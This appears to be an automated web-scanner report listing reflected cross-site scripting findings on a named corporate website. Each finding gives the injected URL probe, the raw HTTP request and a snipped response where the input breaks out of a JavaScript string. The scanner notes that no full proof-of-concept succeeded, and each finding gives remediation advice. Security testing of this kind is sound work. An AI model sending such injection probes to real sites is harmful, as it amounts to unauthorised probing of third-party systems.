//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENT
...[SNIP]...

1.916. http://www.verizonbusiness.com/solutions/bysolutions/app-performance/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/app-performance/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4765'%3bbb591b4472e was submitted in the REST URL parameter 2. This input was echoed as c4765';bb591b4472e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutionsc4765'%3bbb591b4472e/app-performance/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:17 GMT
Content-Type: text/html
Content-Length: 41888
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutionsc4765';bb591b4472e/app-performance/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.917. http://www.verizonbusiness.com/solutions/bysolutions/app-performance/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/app-performance/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 442ee'%3b14611cfe4f6 was submitted in the REST URL parameter 3. This input was echoed as 442ee';14611cfe4f6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/app-performance442ee'%3b14611cfe4f6/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:37:21 GMT
Content-Type: text/html
Content-Length: 43112
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:21 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:21 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutions/app-performance442ee';14611cfe4f6/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.918. http://www.verizonbusiness.com/solutions/bysolutions/app-performance/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/app-performance/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f9e7"%3b4cdbc237f8c was submitted in the REST URL parameter 3. This input was echoed as 2f9e7";4cdbc237f8c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/app-performance2f9e7"%3b4cdbc237f8c/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:36:54 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 43110
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:54 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutions/app-performance2f9e7";4cdbc237f8c/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.919. http://www.verizonbusiness.com/solutions/bysolutions/automation/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/automation/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 336dd"%3bc7ef86c583f was submitted in the REST URL parameter 1. This input was echoed as 336dd";c7ef86c583f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions336dd"%3bc7ef86c583f/bysolutions/automation/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:36:45 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40664
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:45 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:45 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions336dd";c7ef86c583f/bysolutions/automation/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM
...[SNIP]...

1.920. http://www.verizonbusiness.com/solutions/bysolutions/automation/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/automation/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac984'%3b0aa0fbffa62 was submitted in the REST URL parameter 1. This input was echoed as ac984';0aa0fbffa62 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutionsac984'%3b0aa0fbffa62/bysolutions/automation/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:37:05 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40664
Date: Wed, 17 Nov 2010 00:37:05 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:05 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutionsac984';0aa0fbffa62/bysolutions/automation/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.921. http://www.verizonbusiness.com/solutions/bysolutions/automation/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/automation/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ab9f'%3b84c8265dc3b was submitted in the REST URL parameter 2. This input was echoed as 1ab9f';84c8265dc3b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions1ab9f'%3b84c8265dc3b/automation/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:37:44 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 41876
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:45 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:44 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutions1ab9f';84c8265dc3b/automation/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.922. http://www.verizonbusiness.com/solutions/bysolutions/automation/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/automation/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a984"%3bea511c1c5b4 was submitted in the REST URL parameter 2. This input was echoed as 1a984";ea511c1c5b4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions1a984"%3bea511c1c5b4/automation/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:37:21 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 41876
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:21 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:21 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutions1a984";ea511c1c5b4/automation/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR
...[SNIP]...

1.923. http://www.verizonbusiness.com/solutions/bysolutions/automation/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/automation/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4a707"%3b6e880901f39 was submitted in the REST URL parameter 3. This input was echoed as 4a707";6e880901f39 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/automation4a707"%3b6e880901f39/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:01 GMT
Content-Type: text/html
Content-Length: 43100
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:01 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutions/automation4a707";6e880901f39/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.924. http://www.verizonbusiness.com/solutions/bysolutions/automation/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/automation/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f8197'%3b0bfbadd0357 was submitted in the REST URL parameter 3. This input was echoed as f8197';0bfbadd0357 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/automationf8197'%3b0bfbadd0357/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:38:24 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 43100
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:24 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:24 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutions/automationf8197';0bfbadd0357/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.925. http://www.verizonbusiness.com/solutions/bysolutions/cloud/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/cloud/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48ae4"%3b55d29e63734 was submitted in the REST URL parameter 1. This input was echoed as 48ae4";55d29e63734 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions48ae4"%3b55d29e63734/bysolutions/cloud/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:34:53 GMT
Content-Type: text/html
Content-Length: 40656
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:34:53 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:34:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions48ae4";55d29e63734/bysolutions/cloud/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEME
...[SNIP]...

1.926. http://www.verizonbusiness.com/solutions/bysolutions/cloud/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/cloud/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4200'%3bbf8b43f03ec was submitted in the REST URL parameter 1. This input was echoed as d4200';bf8b43f03ec in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutionsd4200'%3bbf8b43f03ec/bysolutions/cloud/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:35:29 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40654
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:29 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:29 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutionsd4200';bf8b43f03ec/bysolutions/cloud/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.927. http://www.verizonbusiness.com/solutions/bysolutions/cloud/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/cloud/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8ba6"%3b5b9a53619d2 was submitted in the REST URL parameter 2. This input was echoed as a8ba6";5b9a53619d2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutionsa8ba6"%3b5b9a53619d2/cloud/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:35:57 GMT
Content-Type: text/html
Content-Length: 41868
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:57 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutionsa8ba6";5b9a53619d2/cloud/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMI
...[SNIP]...

1.928. http://www.verizonbusiness.com/solutions/bysolutions/cloud/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/cloud/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7bc9'%3bb238e65321e was submitted in the REST URL parameter 2. This input was echoed as c7bc9';b238e65321e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutionsc7bc9'%3bb238e65321e/cloud/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:36:21 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 41866
Date: Wed, 17 Nov 2010 00:36:21 GMT
Connection: close
